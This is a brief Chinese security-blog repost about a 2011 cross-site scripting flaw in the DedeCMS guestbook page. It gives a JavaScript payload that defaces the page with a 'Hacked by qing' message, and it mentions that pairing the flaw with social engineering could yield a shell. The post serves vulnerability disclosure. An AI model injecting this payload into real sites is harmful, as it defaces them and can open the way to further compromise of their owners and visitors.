By:hackqing
2011/9/5/8:58 dedecms 的 0day 又出来了,2011/9/5/8:58 dedecms 留言本 XSS 漏洞。
呵呵。其实只是xss,结合下社工还是可以拿shell的
plus/guestbook/index.php
>>>>function init() { document.write('Hacked by qing');}window.onload = init; ;
就可以绕过了……
文章来源于lcx.cc:2011/9/5/8:58 dedecms 留言本 XSS 漏洞
相关推荐: 【VB】遍历Winsock数组 提供新的Winsock控件
VB 提供新的 Winsock 控件,VB 提供新 Winsock 控件,VB 遍历 Winsock 数组,VB 提供 Winsock 控件,VB 新的 Winsock 控件,VB 新 Winsock 控件,VB 遍历 Winsock,VB Winso…
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论